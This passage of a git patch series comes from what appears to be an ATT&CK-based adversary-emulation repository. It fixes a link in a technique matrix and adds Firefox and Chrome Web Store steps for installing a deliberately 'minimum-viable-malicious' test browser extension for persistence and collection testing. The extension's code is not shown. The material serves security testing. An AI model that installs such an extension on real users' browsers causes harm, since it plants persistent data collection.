Registry](Discovery/Query_Registry.md) | Remote Services | [PowerShell](Execution/PowerShell.md) | Email Collection | Scheduled Transfer | Fallback Channels | | [Component Object Model Hijacking](Persistence/Component_Object_Model_Hijacking.md) | File System Permissions Weakness | Disabling Security Tools | Network Sniffing | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | Replication Through Removable Media | [Regsvcs/Regasm](Execution/RegsvcsRegasm.md) | Input Capture | | Multi-Stage Channels | From 5dc3e366664c2747cd758349a30d6a79870c67ff Mon Sep 17 00:00:00 2001 From: Dan Bourke Date: Mon, 26 Feb 2018 13:16:16 +1100 Subject: [PATCH 08/10] typo in README.md --- Linux/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Linux/README.md b/Linux/README.md index 7c2cc91c..504087b8 100644 --- a/Linux/README.md +++ b/Linux/README.md 
@@ -4,7 +4,7 @@
 |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
 | [.bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Exploitation of Vulnerability | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md) | Application Deployment Software | [Command-Line Interface](Execution/Command-Line_Interface.md) | Audio Capture | Automated Exfiltration | Commonly Used Port |
 | Bootkit | [Setuid and Setgid](Privilege_Escalation/Setuid_and_Setgid.md) | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | [File and Directory Discovery](Discovery/File_and_Directory_Discovery.md) | Exploitation of Vulnerability | Graphical User Interface | Automated Collection | Data Compressed | Communication Through Removable Media |
-| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collections/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
+| [Browser Extensions](Persistence/Browser_Extensions.md)| Sudo | Disabling Security Tools | [Create Account](Credential_Access/Create_Account.md) | [Network Service Scanning](Discovery/Network_Service_Scanning.md) | Remote File Copy | Scripting | [Browser Extensions](Collection/Browser_Extensions.md) | Data Encrypted | Connection Proxy |
 | [Cron Job](Persistence/Cron_Job.md) | Valid Accounts | Exploitation of Vulnerability | Credentials in Files | Permission Groups Discovery | Remote Services | Source | Clipboard Data | Data Transfer Size Limits | Custom Command and Control Protocol |
 | Hidden Files and Directories | Web Shell | File Deletion | Exploitation of Vulnerability | [Process Discovery](Discovery/Process_Discovery.md) | Third-party Software | Space after Filename | Data Staged | [Exfiltration Over Alternative Protocol](Exfiltration/Exfiltration_Over_Alternative_Protocol.md) | Custom Cryptographic Protocol |
 | Rc.common | | [HISTCONTROL](Defense_Evasion/HISTCONTROL.md) | Input Capture | [Remote System Discovery](Discovery/Remote_System_Discovery.md) | | Third-party Software | Data from Local System | Exfiltration Over Command and Control Channel | Data Encoding |
From 24412945ce0ad35cb9fb1ca2a2ddf7fc00a0bd00 Mon Sep 17 00:00:00 2001
From: Dan Bourke
Date: Mon, 26 Feb 2018 15:16:12 +1100
Subject: [PATCH 09/10] add instructions for Firefox

---
 Linux/Collection/Browser_Extensions.md | 10 +++++++++-
 Linux/Persistence/Browser_Extensions.md | 10 +++++++++-
 Mac/Collection/Browser_Extensions.md | 10 +++++++++-
 Mac/Persistence/Browser_Extensions.md | 10 +++++++++-
 Windows/Collection/Browser_Extensions.md | 10 +++++++++-
 Windows/Persistence/Browser_Extensions.md | 10 +++++++++-
 6 files changed, 54 insertions(+), 6 deletions(-)

diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md
index f38f59f4..c99e7c63 100644
--- a/Linux/Collection/Browser_Extensions.md
+++ b/Linux/Collection/Browser_Extensions.md
@@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file
diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md
index f38f59f4..c99e7c63 100644
--- a/Linux/Persistence/Browser_Extensions.md
+++ b/Linux/Persistence/Browser_Extensions.md
@@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file
diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
index f38f59f4..c99e7c63 100644
--- a/Mac/Collection/Browser_Extensions.md
+++ b/Mac/Collection/Browser_Extensions.md
@@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file
diff --git a/Mac/Persistence/Browser_Extensions.md b/Mac/Persistence/Browser_Extensions.md
index f38f59f4..c99e7c63 100644
--- a/Mac/Persistence/Browser_Extensions.md
+++ b/Mac/Persistence/Browser_Extensions.md
@@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file
diff --git a/Windows/Collection/Browser_Extensions.md b/Windows/Collection/Browser_Extensions.md
index f38f59f4..c99e7c63 100644
--- a/Windows/Collection/Browser_Extensions.md
+++ b/Windows/Collection/Browser_Extensions.md
@@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file
diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md
index f38f59f4..c99e7c63 100644
--- a/Windows/Persistence/Browser_Extensions.md
+++ b/Windows/Persistence/Browser_Extensions.md
@@ -9,4 +9,12 @@ Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode' Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloads/Browser_Extension/) -Then click 'Select' \ No newline at end of file +Then click 'Select' + +### Firefox + +Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on" + +Navigate to [manifest.json](../Payloads/Browser_Extension/manifest.json) + +Then click 'Open' \ No newline at end of file
From 3e4ba89cf472aa88518eea3a85b4469bcc3bbcb5 Mon Sep 17 00:00:00 2001
From: Dan Bourke
Date: Mon, 26 Feb 2018 16:26:56 +1100
Subject: [PATCH 10/10] adding actually published extension details

---
 Linux/Collection/Browser_Extensions.md | 6 +++++-
 Linux/Persistence/Browser_Extensions.md | 6 +++++-
 Mac/Collection/Browser_Extensions.md | 6 +++++-
 Mac/Persistence/Browser_Extensions.md | 6 +++++-
 Windows/Collection/Browser_Extensions.md | 6 +++++-
 Windows/Persistence/Browser_Extensions.md | 6 +++++-
 6 files changed, 30 insertions(+), 6 deletions(-)

diff --git a/Linux/Collection/Browser_Extensions.md b/Linux/Collection/Browser_Extensions.md
index c99e7c63..3550fb8c 100644
--- a/Linux/Collection/Browser_Extensions.md
+++ b/Linux/Collection/Browser_Extensions.md
@@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
@@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
diff --git a/Linux/Persistence/Browser_Extensions.md b/Linux/Persistence/Browser_Extensions.md
index c99e7c63..3550fb8c 100644
--- a/Linux/Persistence/Browser_Extensions.md
+++ b/Linux/Persistence/Browser_Extensions.md
@@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
@@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
diff --git a/Mac/Collection/Browser_Extensions.md b/Mac/Collection/Browser_Extensions.md
index c99e7c63..3550fb8c 100644
--- a/Mac/Collection/Browser_Extensions.md
+++ b/Mac/Collection/Browser_Extensions.md
@@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
@@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
diff --git a/Mac/Persistence/Browser_Extensions.md b/Mac/Persistence/Browser_Extensions.md
index c99e7c63..3550fb8c 100644
--- a/Mac/Persistence/Browser_Extensions.md
+++ b/Mac/Persistence/Browser_Extensions.md
@@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
@@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
diff --git a/Windows/Collection/Browser_Extensions.md b/Windows/Collection/Browser_Extensions.md
index c99e7c63..3550fb8c 100644
--- a/Windows/Collection/Browser_Extensions.md
+++ b/Windows/Collection/Browser_Extensions.md
@@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
@@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"
diff --git a/Windows/Persistence/Browser_Extensions.md b/Windows/Persistence/Browser_Extensions.md
index c99e7c63..3550fb8c 100644
--- a/Windows/Persistence/Browser_Extensions.md
+++ b/Windows/Persistence/Browser_Extensions.md
@@ -3,7 +3,7 @@ MITRE ATT&CK Technique: [T1176](https://attack.mitre.org/wiki/Technique/T1176) -### Chrome +### Chrome (Developer Mode) Navigate to [chrome://extensions](chrome://extensions) and tick 'Developer Mode'.
@@ -11,6 +11,10 @@ Click 'Load unpacked extension...' and navigate to [Browser_Extension](../Payloa Then click 'Select' +### Chrome (Chrome Web Store) + +Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend in Chrome and click 'Add to Chrome' + ### Firefox Navigate to [about:debugging](about:debugging) and click "Load Temporary Add-on"